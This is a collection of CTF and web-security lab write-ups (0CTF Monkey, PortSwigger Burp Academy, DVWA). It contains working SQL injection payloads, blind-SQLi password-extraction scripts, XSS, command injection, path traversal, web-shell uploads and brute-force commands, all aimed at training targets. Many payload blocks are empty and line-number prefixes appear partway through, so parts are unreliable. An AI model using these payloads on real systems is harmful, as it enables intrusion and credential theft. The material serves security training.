```
├── 0CTF 2016 Quals
│   ├── README.md
│   └── monkey.md
├── Burp-Academy
│   └── burp-academy.md
├── DVWA
│   ├── dvwa-hard.md
│   ├── dvwa-low.md
│   └── dvwa-medium.md
├── PentesterAcademy
│   └── js-for-pentesters.md
├── README.md
├── ctf.infosecinstitute.com
│   └── README.md
├── exploit-exercises.com
│   └── nebula.md
├── flaws.cloud
│   └── flaws.cloud.md
├── hacking-lab.com
│   ├── top10.md
│   └── webgoat
│       ├── README.md
│       ├── challenge1.md
│       ├── challenge10.md
│       ├── challenge11.md
│       ├── challenge12.md
│       ├── challenge13.md
│       ├── challenge14.md
│       ├── challenge15.md
│       ├── challenge16.md
│       ├── challenge17.md
│       ├── challenge18.md
│       ├── challenge2.md
│       ├── challenge3.md
│       ├── challenge4.md
│       ├── challenge5.md
│       ├── challenge6.md
│       ├── challenge7.md
│       ├── challenge8.md
│       └── challenge9.md
├── ropemporium.com
│   ├── ropemporium32.md
│   └── ropemporium64.md
└── wechall.net
    ├── natas.md
    └── wechall.md
```

/0CTF 2016 Quals/README.md:
--------------------------------------------------------------------------------

0CTF 2016 Quals (https://ctf.0ops.net/)

/0CTF 2016 Quals/monkey.md:
--------------------------------------------------------------------------------

### Monkey (Web 4)

#### Vulnerability

Generally: browsers' inherent weakness and susceptibility to DNS rebinding attacks; in particular: the lack of a DNS pinning countermeasure in the Monkey "browser".

#### Exploitation

**Overview**

We were given a clue that Monkey will stay on the visited page for 2 minutes.
So to exploit it we need to:

- delay execution of our JavaScript for as long as possible (but of course less than 2 minutes)
- make sure that our domain has a low TTL set (60 sec for example)

When Monkey visits our domain it will be resolved to the `4.3.2.1` IP, but after 110 sec (when the JS wakes up from its timeout) Monkey will need to do an additional DNS query (because the TTL has already expired) to execute this line: `xhttp.open("GET", "http://x.mydomain.com:8080/secret", false);`, and this time (after changing the DNS setting in between) the domain will resolve to `127.0.0.1`.

**Prerequisites**

- server with a public IP (for example an AWS t2.nano instance with IP 4.3.2.1)
- domain name pointing to the above machine (for example x.mydomain.com) with a low TTL value (60 sec)

**Server preparation**

```
$ cat << EOF > file.html
EOF
```

```
$ python3 -m http.server --bind 0.0.0.0 8080
```

**Finding proof of work**

```
$ links https://www.google.com/?q=<6_chars_from_monkey_page>+md5
```

**Triggering Monkey to browse your `x.mydomain.com:8080/file.html`**

```
$ curl http://202.120.7.200/run.php -d 'task=&url='
```

**Changing DNS setting**

In AWS Route 53 change: `x.mydomain.com -> 127.0.0.1`

Verify the change of the DNS setting:

```
$ dig +nocmd +noall +answer x.mydomain.com
```

After 110 secs observe python's http.server logs for the flag.
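
The flaw exploited above is the browser's missing DNS pinning, but the local service on `127.0.0.1:8080` can defend itself: after rebinding, the request still carries the attacker's name in its Host header (`x.mydomain.com:8080`). The following is an added defensive example, not code from the write-up, showing a Host-header check for `python3 -m http.server`; it assumes the service is only ever reached as `localhost`, `127.0.0.1` or `::1` on port 8080.

```python
"""Host-header check against DNS rebinding for a local HTTP service.

Added example (not part of the original write-up). A rebound request from the
browser arrives with Host: x.mydomain.com:8080, a name this service does not
own, so answering only for its own names makes the rebinding useless.
Assumption: the service is reached as localhost / 127.0.0.1 / [::1] on port 8080.
"""
import http.server

ALLOWED_HOSTS = {"localhost", "127.0.0.1", "::1"}
LISTEN_PORT = 8080


def split_host_header(value):
    """Return (hostname, port) from a Host header value; port is None if absent.

    Handles the bracketed IPv6 form "[::1]:8080" as well as "name:port".
    """
    value = value.strip().lower()
    if value.startswith("["):
        end = value.find("]")
        if end == -1:
            return value, None
        host = value[1:end]
        rest = value[end + 1:]
        if rest.startswith(":") and rest[1:].isdigit():
            return host, int(rest[1:])
        return host, None
    host, sep, port = value.rpartition(":")
    if sep and port.isdigit():
        return host, int(port)
    return value, None


def host_allowed(header_value, allowed=ALLOWED_HOSTS, port=LISTEN_PORT):
    """True only when the Host header names this service under one of its own names."""
    if header_value is None:
        return False
    host, hdr_port = split_host_header(header_value)
    if host not in allowed:
        return False
    return hdr_port is None or hdr_port == port


class HostCheckingHandler(http.server.SimpleHTTPRequestHandler):
    """http.server handler that answers 421 for a Host it does not own."""

    def do_GET(self):
        if not host_allowed(self.headers.get("Host")):
            # 421 Misdirected Request: the name in Host is not ours.
            self.send_error(421, "Misdirected Request")
            return
        super().do_GET()


if __name__ == "__main__":
    # Serve the current directory on 127.0.0.1:8080 with the Host check in front.
    http.server.HTTPServer(("127.0.0.1", LISTEN_PORT), HostCheckingHandler).serve_forever()
```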

Flag: 0ctf{monkey_likes_banananananananaaaa}

/Burp-Academy/burp-academy.md:
--------------------------------------------------------------------------------

### Lab: LAB-NAME-HERE

**Target**

**Discovery**

**Analysis**

**Exploitation**

**Mitigation**

## SQL injection

### Lab: SQL injection vulnerability in WHERE clause allowing retrieval of hidden data

https://portswigger.net/web-security/sql-injection/lab-retrieve-hidden-data

Payload: `' OR 'a'='a'--`

Solution:

https://ac621fd21eb2b0e1c082847f00be0097.web-security-academy.net/filter?category=%27%20OR%20%27a%27=%27a%27--

### Lab: SQL injection vulnerability allowing login bypass

https://portswigger.net/web-security/sql-injection/lab-login-bypass

Payload: `' or '1'='1`

Solution:

```
curl -s https://ac961fbe1e874560c0a53e2700c50025.web-security-academy.net/login -d 'csrf=02gPIAfYLxmgx07NosP5ChXUji8LZDi0&username=administrator&password=%27+or+%271%27%3D%271'
```

### Lab: SQL injection UNION attack, determining the number of columns returned by the query

https://portswigger.net/web-security/sql-injection/union-attacks/lab-determine-number-of-columns

Payload:

```
' union select null,null,null--
```

### Lab: SQL injection UNION attack, finding a column containing text

https://portswigger.net/web-security/sql-injection/union-attacks/lab-find-column-containing-text

Payload:

```
' union select null,'We2TqZ',null--
```

### Lab: SQL injection UNION attack, retrieving data from other tables

https://portswigger.net/web-security/sql-injection/union-attacks/lab-retrieve-data-from-other-tables

Payload:

```
' union select username,password FROM users--
```

### Lab: SQL injection UNION attack, retrieving multiple values in a single column

https://portswigger.net/web-security/sql-injection/union-attacks/lab-retrieve-multiple-values-in-single-column

Payload:

```
' union select null,concat(username,password) FROM users--
```

### Lab: SQL injection attack, querying the database type and version on Oracle

https://portswigger.net/web-security/sql-injection/examining-the-database/lab-querying-database-version-oracle

Payload:

```
' UNION SELECT banner,null FROM v$version --
```

### Lab: SQL injection attack, querying the database type and version on MySQL and Microsoft

https://portswigger.net/web-security/sql-injection/examining-the-database/lab-querying-database-version-mysql-microsoft

Payload:

```
' union select @@version,null--%20
```

### Lab: SQL injection attack, listing the database contents on non-Oracle databases

https://portswigger.net/web-security/sql-injection/examining-the-database/lab-listing-database-contents-non-oracle

List tables:

```
%27%20union%20select+TABLE_NAME,null+FROM+information_schema.tables--
```

List column names from the selected table:

```
%27%20union%20select+COLUMN_NAME,null+FROM+information_schema.columns+WHERE+table_name+=+'users_dxfmgd'--
```

List users and passwords:

```
%27%20union%20select+username_ppvobv,password_vddlrf+FROM+users_dxfmgd--
```

### Lab: SQL injection attack, listing the database contents on Oracle

https://portswigger.net/web-security/sql-injection/examining-the-database/lab-listing-database-contents-oracle

### Lab: Blind SQL injection with conditional responses

https://portswigger.net/web-security/sql-injection/blind/lab-conditional-responses

Solution:

```
#!/usr/bin/python3

# (http://docs.python-requests.org/en/latest/)
import requests

s = requests.session()

# Recover the administrator's password one character at a time (positions 1..20):
# the page shows "Welcome back!" only when the injected condition is true.
for j in range(1, 21):
    for i in range(48, 123):
        payload = ("sA0oQJbDuua9SbuH'+AND+ASCII(SUBSTR((SELECT+Password+FROM+Users+WHERE+Username+%3d+'administrator'),"
                   + str(j) + ",1))=" + str(i) + "--+")
        cookie = dict(TrackingId=payload)
        r = s.get("https://0a07001f038c1271c616462c001d0021.web-security-academy.net/filter?category=Pets", cookies=cookie)

        if 'Welcome back!' in r.text:
            print(chr(i))
            break
```

### Lab: Blind SQL injection with conditional errors

https://portswigger.net/web-security/sql-injection/blind/lab-conditional-errors

Solution:

```
#!/usr/bin/python3

# (http://docs.python-requests.org/en/latest/)
import requests

s = requests.session()

# The Oracle CASE expression raises a division-by-zero error (HTTP 500) only
# when the guessed character at position j is right.
for j in range(1, 21):
    for i in range(48, 123):
        payload = ("YHjR3e0Tqh1FkBsZ' AND (SELECT CASE WHEN (ASCII(SUBSTR(Password, "
                   + str(j) + ",1)) = " + str(i)
                   + ") THEN TO_CHAR(1/0) ELSE 'a' END FROM users WHERE username='administrator')='a")
        cookie = dict(TrackingId=payload)
        r = s.get("https://0a3d009603a90aa2c3a970580085001c.web-security-academy.net/filter?category=Gifts", cookies=cookie)

        if r.status_code == 500:
            print(chr(i))
            break
```

### Lab: Visible error-based SQL injection

https://portswigger.net/web-security/sql-injection/blind/lab-sql-injection-visible-error-based

Payload:

```
' AND CAST((SELECT password from users LIMIT 1) AS bool)--
```

### Lab: Blind SQL injection with time delays

https://portswigger.net/web-security/sql-injection/blind/lab-time-delays

Payload:

```
;SELECT+pg_sleep(10)--
```

### Lab: Blind SQL injection with time delays and information retrieval

https://portswigger.net/web-security/sql-injection/blind/lab-time-delays-info-retrieval

Solution:

```
#!/usr/bin/python3

# (https://docs.python-requests.org/en/latest/)
import datetime
import requests

s = requests.session()

# PostgreSQL's pg_sleep(7) runs only when the guessed character is right, so a
# response that takes longer than 7 s confirms the guess.
for j in range(1, 21):
    for i in range(48, 123):
        payload = ("'%3b SELECT CASE WHEN (ASCII(SUBSTRING(Password, " + str(j) + ",1)) = " + str(i)
                   + ") THEN pg_sleep(7) ELSE pg_sleep(0) END FROM users WHERE username='administrator'--")
        cookie = dict(TrackingId=payload)
        start = datetime.datetime.now()
        r = s.get("https://0a6e00a603ca30c5c0067c0a00470033.web-security-academy.net/filter?category=Gifts", cookies=cookie, timeout=8)
        stop = datetime.datetime.now()
        elapsed = stop - start

        if elapsed > datetime.timedelta(seconds=7):
            print(chr(i))
            break
```

### Lab: Blind SQL injection with out-of-band interaction

https://portswigger.net/web-security/sql-injection/blind/lab-out-of-band

### Lab: Blind SQL injection with out-of-band data exfiltration

https://portswigger.net/web-security/sql-injection/blind/lab-out-of-band-data-exfiltration

### Lab: SQL injection with filter bypass via XML encoding

https://portswigger.net/web-security/sql-injection/lab-sql-injection-with-filter-bypass-via-xml-encoding

## XSS

### Lab: Reflected XSS into HTML context with nothing encoded

https://portswigger.net/web-security/cross-site-scripting/reflected/lab-html-context-nothing-encoded

Payload: ``

Solution:

https://ac301f9a1feab630c06628c800590004.web-security-academy.net/?search=%3Cscript%3Ealert%281%29%3C%2Fscript%3E

### Lab: Stored XSS into HTML context with nothing encoded

https://portswigger.net/web-security/cross-site-scripting/stored/lab-html-context-nothing-encoded

Payload: ``

Solution:

```
curl -s https://ac441f571ee3c7f6c0d47ecf009500b5.web-security-academy.net/post/comment -d 'csrf=JjGC1fbulzEdU0pPT6g2Ty2tBWcjoEaq&postId=9&comment=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&name=sdf&email=sdfsd%40sdfsdfsdf.er&website=http%3A%2F%2Fdfsd.df'
```

### Lab: DOM XSS in document.write sink using source location.search

https://portswigger.net/web-security/cross-site-scripting/dom-based/lab-document-write-sink

Payload: `">`

Solution:

https://aca31fc71ff01052c05f047b00ea000b.web-security-academy.net/?search=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E

### Lab: DOM XSS in innerHTML sink using source location.search

https://portswigger.net/web-security/cross-site-scripting/dom-based/lab-innerhtml-sink

Payload: ``

Solution:

https://ac9b1f881fdbcb19c0c5026f00d3008b.web-security-academy.net/?search=%3Cimg+src%3D1+onerror%3D%27alert%281%29%27%2F%3E

### Lab: DOM XSS in jQuery anchor href attribute sink using location.search source

https://portswigger.net/web-security/cross-site-scripting/dom-based/lab-jquery-href-attribute-sink

Payload: `javascript:alert(document.cookie)`

Solution:

https://accb1fd31e8cc586c08e432600d300df.web-security-academy.net/feedback?returnPath=javascript:alert(document.cookie)

### Lab: DOM XSS in jQuery selector sink using a hashchange event

https://portswigger.net/web-security/cross-site-scripting/dom-based/lab-jquery-selector-hash-change-event

Payload:

```
```

Entice a victim to visit the site.

## OS command injection

### Lab: OS command injection, simple case

https://portswigger.net/web-security/os-command-injection/lab-simple

Solution:

```
curl -s https://ac6d1f651f877b62c0b55c6900bf0003.web-security-academy.net/product/stock -d 'productId=4;&storeId=whoami'
```

## Directory traversal

### Lab: File path traversal, simple case

https://portswigger.net/web-security/file-path-traversal/lab-simple

Solution:

```
curl -s https://ac6e1f941f6b5fc4c0268759008a0086.web-security-academy.net/image?filename=../../../etc/passwd
```

### Lab: File path traversal, validation of file extension with null byte bypass

https://portswigger.net/web-security/file-path-traversal/lab-validate-file-extension-null-byte-bypass

Solution:

```
curl -s https://acca1fb61f2f6549c01b7fe40084009d.web-security-academy.net/image?filename=../../../etc/passwd%00.jpg
```

## Insecure deserialization

### Lab: Modifying serialized objects

https://portswigger.net/web-security/deserialization/exploiting/lab-deserialization-modifying-serialized-objects

Solution:

```
curl -L -k -x 127.0.0.1:8080 --cookie session="$(rawurlencode "$(echo -n 'O:4:"User":2:{s:8:"username";s:13:"administrator";s:5:"admin";b:1;}' | base64 -w 0)")" -s https://acb81f701e4368eac086a2d100ff0039.web-security-academy.net/admin/delete?username=carlos
```

## File upload vulnerabilities

### Lab: Remote code execution via web shell upload

https://portswigger.net/web-security/file-upload/lab-file-upload-remote-code-execution-via-web-shell-upload

Solution:

```
# file upload:
curl --cookie 'session=dyqaoIriO5ZVrUFaVPkJzQUzO4owEwQG' -s https://acdb1f251fb9fcc8c0b20af000e500ae.web-security-academy.net/my-account/avatar -F "filename=s.php" -F "avatar='';filename=s.php" -F "csrf=WjAuaitTZfPMr38U0DT3VY3cGA0ActDq" -F "user=wiener"
# file execution:
curl https://acdb1f251fb9fcc8c0b20af000e500ae.web-security-academy.net/files/avatars/s.php
```

### Lab: Web shell upload via Content-Type restriction bypass

https://portswigger.net/web-security/file-upload/lab-file-upload-web-shell-upload-via-content-type-restriction-bypass

Solution (as previously, but explicitly spoof `Content-Type`):

```
curl --cookie 'session=tGHaK4JFRKUYlLN6LiAJi0kyAr3uPPpy' -s https://ac2b1f8e1e792d53c084231a00e50037.web-security-academy.net/my-account | grep csrf

curl --cookie 'session=tGHaK4JFRKUYlLN6LiAJi0kyAr3uPPpy' -s https://ac2b1f8e1e792d53c084231a00e50037.web-security-academy.net/my-account/avatar -F "filename=s.php" -F "avatar='';filename=s.php;type=image/png" -F "csrf=bwZwpzDsnnWqkQwAj3vqLuvTEDN06VDx" -F "user=wiener"

curl --cookie 'session=tGHaK4JFRKUYlLN6LiAJi0kyAr3uPPpy' -s https://ac2b1f8e1e792d53c084231a00e50037.web-security-academy.net/files/avatars/s.php
```

## Business logic vulnerabilities

### Lab: Excessive trust in client-side controls

https://portswigger.net/web-security/logic-flaws/examples/lab-logic-flaws-excessive-trust-in-client-side-controls

Solution steps:

1) Log in
2) Intercept the 'Add to cart' request and change its `price` parameter
3) Buy the product for the chosen price

### Lab: High-level logic vulnerability

https://portswigger.net/web-security/logic-flaws/examples/lab-logic-flaws-high-level

Solution:

1) Log in
2) Observe that the `quantity` parameter of the `POST /cart` request accepts negative numbers.
Therefore the total price can be negative.
3) Taking advantage of (2), put -60 of the 2nd product into the cart, then add the first product to the cart.
4) The total price will be computed as `price of the first product + -60 * price of the 2nd product`, so it will be less than the number of your credits.

### Lab: Inconsistent security controls

https://portswigger.net/web-security/logic-flaws/examples/lab-logic-flaws-inconsistent-security-controls

Solution steps:

1) Register as an `administrator` user providing your attacker email
2) Activate the account using the received activation link
3) Log in
4) Change your email to `admin@dontwannacry.com`
5) Access the admin panel and delete the `carlos` user

### Lab: Flawed enforcement of business rules

https://portswigger.net/web-security/logic-flaws/examples/lab-logic-flaws-flawed-enforcement-of-business-rules

Solution:

1. Sign up for the newsletter with `POST /sign-up`; a new promo code will be received.
2. Add the promo codes alternately until the product becomes affordable.

## WebSockets

### Lab: Manipulating WebSocket messages to exploit vulnerabilities

https://portswigger.net/web-security/websockets/lab-manipulating-messages-to-exploit-vulnerabilities

Payload: ``

Solution (3rd party tool used: https://github.com/vi/websocat):

```
echo -n "{\"message\":\"\"}" | websocat --text -v - wss://acc21f591f207752c010be23002b006e.web-security-academy.net/chat
```

### Lab: Cross-site WebSocket hijacking

This is basically CSRF over a WebSocket connection. The victim is tricked into visiting a malicious website which performs the WebSocket handshake on behalf of the victim and then gets access to the victim's data (chat history).
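
The handshake forged by the malicious page is accepted because the browser attaches the victim's session cookie and the server checks nothing else. The following is an added example, not code from the lab or this write-up, of what the chat server should check instead: the `Origin` header (which the attacker's page cannot alter) and a per-session anti-CSRF token in the handshake URL (which the attacker's page cannot read). All names are assumptions: the app at `https://chat.example`, a `SESSIONS` store, a `token` query parameter on `/chat`, and constructed handshake requests.

```python
"""Validating a WebSocket handshake against cross-site hijacking.

Added example (not the lab's or the write-up's code). A forged handshake carries
the victim's session cookie, but not a matching per-session token and not our
Origin, so the server rejects it on either ground.
Assumptions: app origin https://chat.example, SESSIONS as the session store,
token passed as ?token=... on /chat. All request text below is constructed.
"""
from urllib.parse import urlsplit, parse_qs
import hmac

ALLOWED_ORIGIN = "https://chat.example"

# Constructed session store: session cookie value -> per-session anti-CSRF token.
SESSIONS = {
    "sess-victim-0001": "tok-4b1d1c2e",
}


def parse_handshake(raw):
    """Split a raw HTTP/1.1 upgrade request into (method, target, headers dict)."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        if not line:
            continue
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, target, headers


def cookie_value(header, name):
    """Pull one cookie out of a Cookie header; None if absent."""
    for part in header.split(";"):
        k, _, v = part.strip().partition("=")
        if k == name:
            return v
    return None


def accept_handshake(raw):
    """Return (accepted, reason). Accept only a WebSocket upgrade whose Origin is
    ours AND whose token in the query string matches the session's token."""
    method, target, headers = parse_handshake(raw)
    if method != "GET" or headers.get("upgrade", "").lower() != "websocket":
        return False, "not a websocket upgrade"
    if headers.get("origin") != ALLOWED_ORIGIN:
        return False, "cross-site origin"
    session = cookie_value(headers.get("cookie", ""), "session")
    expected = SESSIONS.get(session)
    if expected is None:
        return False, "no session"
    token = parse_qs(urlsplit(target).query).get("token", [""])[0]
    if not hmac.compare_digest(token, expected):
        return False, "missing or wrong anti-CSRF token"
    return True, "ok"


# Constructed handshakes. LEGIT is what the real chat page sends; FORGED is what
# the hijacking page makes the victim's browser send: same cookie, the attacker's
# Origin, and no token (the attacker's page has no way to read one).
LEGIT = (
    "GET /chat?token=tok-4b1d1c2e HTTP/1.1\r\n"
    "Host: chat.example\r\n"
    "Upgrade: websocket\r\n"
    "Connection: Upgrade\r\n"
    "Origin: https://chat.example\r\n"
    "Cookie: session=sess-victim-0001\r\n"
    "Sec-WebSocket-Key: dGhlIHNhbXBsZSBub25jZQ==\r\n"
    "Sec-WebSocket-Version: 13\r\n\r\n"
)
FORGED = LEGIT.replace("/chat?token=tok-4b1d1c2e", "/chat").replace(
    "Origin: https://chat.example", "Origin: https://attacker.example")

if __name__ == "__main__":
    print(accept_handshake(LEGIT))   # (True, 'ok')
    print(accept_handshake(FORGED))  # (False, 'cross-site origin')
```

Even if the Origin check were missing, the token check alone still rejects the forged handshake, which is the mitigation the write-up names.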
1596 | 1597 | Solution: 1598 | 1599 | ``` 1600 | 1609 | ``` 1610 | 1611 | Mitigation: 1612 | 1613 | As with standard CSRF, anit CSRF tokens needs to be used to prevent an attacker from forging websocket handshake on behalf of the victim. 1614 | 1615 | ### Lab: Manipulating the WebSocket handshake to exploit vulnerabilities 1616 | 1617 | https://portswigger.net/web-security/websockets/lab-manipulating-handshake-to-exploit-vulnerabilities 1618 | 1619 | ## Authentication 1620 | 1621 | ### Lab: Username enumeration via different responses 1622 | 1623 | https://portswigger.net/web-security/authentication/password-based/lab-username-enumeration-via-different-responses 1624 | 1625 | Solution: 1626 | 1627 | ``` 1628 | ffuf -t 10 -x http://127.0.0.1:8080 -X POST -H 'session:S1mBZqhhKbWEuSF9zb9hwAm0YMhcz7T3' -w users.txt -u https://0adb00360441e61fc0fe135e00bc003a.web-security-academy.net/login -d "username=FUZZ&password=xyz" -fr 'Invalid' 1629 | 1630 | ffuf -t 10 -x http://127.0.0.1:8080 -X POST -H 'session:S1mBZqhhKbWEuSF9zb9hwAm0YMhcz7T3' -w passwd.txt -u https://0adb00360441e61fc0fe135e00bc003a.web-security-academy.net/login -d "username=applications&password=FUZZ" -fr 'Incorrect' 1631 | 1632 | curl -L -H 'session:S1mBZqhhKbWEuSF9zb9hwAm0YMhcz7T3' 'https://0adb00360441e61fc0fe135e00bc003a.web-security-academy.net/login' -d "username=applications&password=pepper" 1633 | ``` 1634 | 1635 | ### Lab: 2FA simple bypass 1636 | 1637 | https://portswigger.net/web-security/authentication/multi-factor/lab-2fa-simple-bypass 1638 | 1639 | Solution: 1640 | 1641 | ``` 1642 | 1. Provide carlos credentials 1643 | 2. 
Modify redirect: instead of `/login2` go directly to `/my-account` 1644 | ``` 1645 | 1646 | ### Lab: Password reset broken logic 1647 | 1648 | https://portswigger.net/web-security/authentication/other-mechanisms/lab-password-reset-broken-logic 1649 | 1650 | Solution: 1651 | 1652 | ``` 1653 | # request reset password link for wiener: 1654 | curl https://0a0c0010038cef70c08939bb006600a1.web-security-academy.net/forgot-password -d "username=wiener" 1655 | 1656 | # set new password for carlos: 1657 | curl -L -k -x 127.0.0.1:8080 --cookie 'session=jhDhbpkpWYLfS9HVTLGS6pDBh6PydHYo' https://0a0c0010038cef70c08939bb006600a1.web-security-academy.net/forgot-password?temp-forgot-password-token=W7J5AbLFD67g5Zrie4vKE9DiyVLUhrnH -d 'temp-forgot-password-token=6KksLbqie6NBvAVcyCPmJr9Qrxskgxzr 1658 | &username=carlos&new-password-1=abc&new-password-2=abc' 1659 | ``` 1660 | 1661 | ## Clickjacking 1662 | 1663 | ### Lab: Basic clickjacking with CSRF token protection 1664 | 1665 | https://portswigger.net/web-security/clickjacking/lab-basic-csrf-protected 1666 | 1667 | Solution: 1668 | 1669 | ``` 1670 | 1685 |
click me
1686 | 1687 | ``` 1688 | 1689 | ### Lab: Clickjacking with form input data prefilled from a URL parameter 1690 | 1691 | https://portswigger.net/web-security/clickjacking/lab-prefilled-form-input 1692 | 1693 | Solution: 1694 | 1695 | ``` 1696 | 1711 |
click me
1712 | 1713 | ``` 1714 | 1715 | ### Lab: Clickjacking with a frame buster script 1716 | 1717 | https://portswigger.net/web-security/clickjacking/lab-frame-buster-script 1718 | 1719 | Solution: 1720 | 1721 | ``` 1722 | 1737 |
click me
1738 | 1739 | ``` 1740 | 1741 | ### Lab: Exploiting clickjacking vulnerability to trigger DOM-based XSS 1742 | 1743 | https://portswigger.net/web-security/clickjacking/lab-exploiting-to-trigger-dom-based-xss 1744 | 1745 | Solution: 1746 | 1747 | ``` 1748 | 1763 |
click me
1764 | 1765 | ``` 1766 | 1767 | ### Lab: Multistep clickjacking 1768 | 1769 | https://portswigger.net/web-security/clickjacking/lab-multistep 1770 | 1771 | Solution: 1772 | 1773 | ``` 1774 | 1796 |
Click me first
1797 |
Click me next
1798 | 1799 | ``` 1800 | 1801 | ## JWT 1802 | 1803 | ### Lab: JWT authentication bypass via unverified signature 1804 | 1805 | **Target** 1806 | 1807 | https://portswigger.net/web-security/jwt/lab-jwt-authentication-bypass-via-unverified-signature 1808 | 1809 | **Discovery** 1810 | 1811 | Modify `sub` field in JWT's payload. Request `GET /my-account`. Observe that your username has changed. 1812 | 1813 | **Exploitation** 1814 | 1815 | Modify `sub` field in JWT's payload to `administrator`. Request `GET /admin/delete?username=carlos`. 1816 | 1817 | **Mitigation** 1818 | 1819 | Verify JWT signature on the backend and reject all requests with invalid signature. 1820 | 1821 | ### Lab: JWT authentication bypass via flawed signature verification 1822 | 1823 | **Target** 1824 | 1825 | https://portswigger.net/web-security/jwt/lab-jwt-authentication-bypass-via-flawed-signature-verification 1826 | 1827 | **Discovery** 1828 | 1829 | Modify `alg` field in JWT's payload to `null`. Request `GET /my-account`. Observe that your request was accepted. 1830 | 1831 | **Exploitation** 1832 | 1833 | Modify `sub` field in JWT's payload to `administrator`. Modify `alg` field in JWT's payload to `null`. Request `GET /admin/delete?username=carlos`. 1834 | 1835 | **Mitigation** 1836 | 1837 | Require JWT signature on the backend and reject requests with `null` signature. 1838 | 1839 | ## Essential skills 1840 | 1841 | ### Lab: Discovering vulnerabilities quickly with targeted scanning 1842 | 1843 | Payload: 1844 | 1845 | ``` 1846 | 1847 | ``` 1848 | 1849 | Raw request: 1850 | 1851 | ``` 1852 | POST /product/stock HTTP/1.1 1853 | [...] 
1854 | Connection: close 1855 | 1856 | productId=&storeId=2 1857 | ``` 1858 | 1859 | ## Race conditions 1860 | 1861 | ### Lab: Limit overrun race conditions 1862 | 1863 | https://portswigger.net/web-security/race-conditions/lab-race-conditions-limit-overrun 1864 | 1865 | Solution: 1866 | 1867 | Apply promo code multiple times sending 15 or so requests in paralell: 1868 | 1869 | ``` 1870 | POST /cart/coupon HTTP/2 1871 | ... 1872 | csrf=&coupon=PROMO20 1873 | ``` 1874 | 1875 | ## GraphQL API vulnerabilities 1876 | 1877 | ### Lab: Accessing private GraphQL posts 1878 | 1879 | https://portswigger.net/web-security/graphql/lab-graphql-reading-private-posts 1880 | 1881 | Solution: 1882 | 1883 | 1. Notice that `getAllPosts` GraphQL command fetches sequential blog posts IDs without `id=3` 1884 | 2. Use InQL extension to modify query to get blog post with `id=3` - but no password there 1885 | 3. Scan with Burp Scanner grapQL endpoint `/graphql/v1` notice in schema that `BlogPost` command has `postPassword` field 1886 | 4. Use InQL extension to modify query to get blog post with `id=3` and add `postPassword` field to the query 1887 | 1888 | ## API testing 1889 | 1890 | ### Lab: Exploiting an API endpoint using documentation 1891 | 1892 | https://portswigger.net/web-security/api-testing/lab-exploiting-api-endpoint-using-documentation 1893 | 1894 | Solution: 1895 | 1896 | 1. Log in with provided creds 1897 | 2. visit API docs at `/api/openapi.json` and look for the way to delete user 1898 | 3. 
Delete user: 1899 | 1900 | ``` 1901 | cat> r.hurl <alert(1); 24 | 25 | ### XSS (Stored) 26 | 27 | Payload for `txtName` field: `` 28 | -------------------------------------------------------------------------------- /DVWA/dvwa-low.md: -------------------------------------------------------------------------------- 1 | 2 | ### Target 3 | 4 | https://github.com/ethicalhack3r/DVWA 5 | 6 | Security level: low 7 | 8 | ### Prereq 9 | 10 | # get user token 11 | $ TOKEN=$(curl -c dvwa.session -s http://192.168.56.101/DVWA/login.php | grep 'user_token' | awk -F 'value=' '{print $2}' | cut -d"'" -f2) 12 | 13 | # get session id 14 | $ PHPSESSID=$(grep PHPSESSID dvwa.session | awk -F' ' '{print $7}') 15 | 16 | # log in 17 | $ curl -L -b "PHPSESSID=${PHPSESSID};security=low" -v -d "username=admin&password=password&Login=Login&user_token=${TOKEN}" http://192.168.56.101/DVWA/login.php 18 | 19 | ### Brute Force 20 | 21 | $ wget https://raw.githubusercontent.com/seifreed/dirb/master/wordlists/others/best110.txt 22 | 23 | $ hydra -t 1 -l admin -P best110.txt -vV 192.168.56.101 http-get-form "/DVWA/vulnerabilities/brute/index.php:username=^USER^&password=^PASS^&Login=Login:F=password incorrect:H=Cookie: PHPSESSID=${PHPSESSID};security=low" 24 | 25 | ### Command Injection 26 | 27 | $ curl -s -b "PHPSESSID=${PHPSESSID};security=low" -d 'ip=;uname+-a&Submit=Submit' http://192.168.56.101/DVWA/vulnerabilities/exec/index.php | grep Linux 28 | 29 | ### CSRF 30 | 31 | # Trick victim (via social engineering means) to visit: 32 | http://192.168.56.101/DVWA/vulnerabilities/csrf/?password_new=pass1&password_conf=pass1&Change=Change 33 | 34 | ### File Inclusion 35 | 36 | $ curl -L -b "PHPSESSID=${PHPSESSID};security=low" -v http://192.168.56.101/DVWA/vulnerabilities/fi/?page=../../hackable/flags/fi.php 37 | 38 | ### File Upload 39 | 40 | ``` 41 | $ cat > b.php < 43 | EOF 44 | 45 | $ curl -x 127.0.0.1:8080 -L -b "PHPSESSID=${PHPSESSID};security=low" -F "MAX_FILE_SIZE=100000" -F 
"uploaded=@b.php;filename=b.php" -F "Upload=Upload" http://192.168.56.101/DVWA/vulnerabilities/upload/index.php 46 | 47 | $ curl -s -b "PHPSESSID=${PHPSESSID};security=low" http://192.168.56.101/DVWA/hackable/uploads/b.php | grep Linux 48 | ``` 49 | 50 | ### Sql Injection 51 | 52 | #### Manual exploitation 53 | 54 | # detecting SQLi 55 | $ curl -x 127.0.0.1:8080 -b "PHPSESSID=${PHPSESSID};security=low" "http://192.168.56.101/DVWA/vulnerabilities/sqli/index.php?id='&Submit=Submit" 56 | 57 | # check if injecting into string data 58 | $ curl -x 127.0.0.1:8080 -b "PHPSESSID=${PHPSESSID};security=low" "http://192.168.56.101/DVWA/vulnerabilities/sqli/index.php?id='+OR+'1'%3D'1&Submit=Submit" 59 | 60 | # retreiving table names 61 | $ curl -x 127.0.0.1:8080 -b "PHPSESSID=${PHPSESSID};security=low" "http://192.168.56.101/DVWA/vulnerabilities/sqli/index.php?id='+union+select+null%2Ctable_name+FROM+information_schema.tables%23&Submit=Submit" 62 | 63 | # retreiving column names for table 'user' 64 | $ curl -x 127.0.0.1:8080 -b "PHPSESSID=${PHPSESSID};security=low" "http://192.168.56.101/DVWA/vulnerabilities/sqli/index.php?id='+union+select+null%2Ccolumn_name+FROM+information_schema.columns+WHERE+table_name='user'%23&Submit=Submit" 65 | 66 | # retreiving users hashes 67 | $ curl -s -x 127.0.0.1:8080 -b "PHPSESSID=${PHPSESSID};security=low" 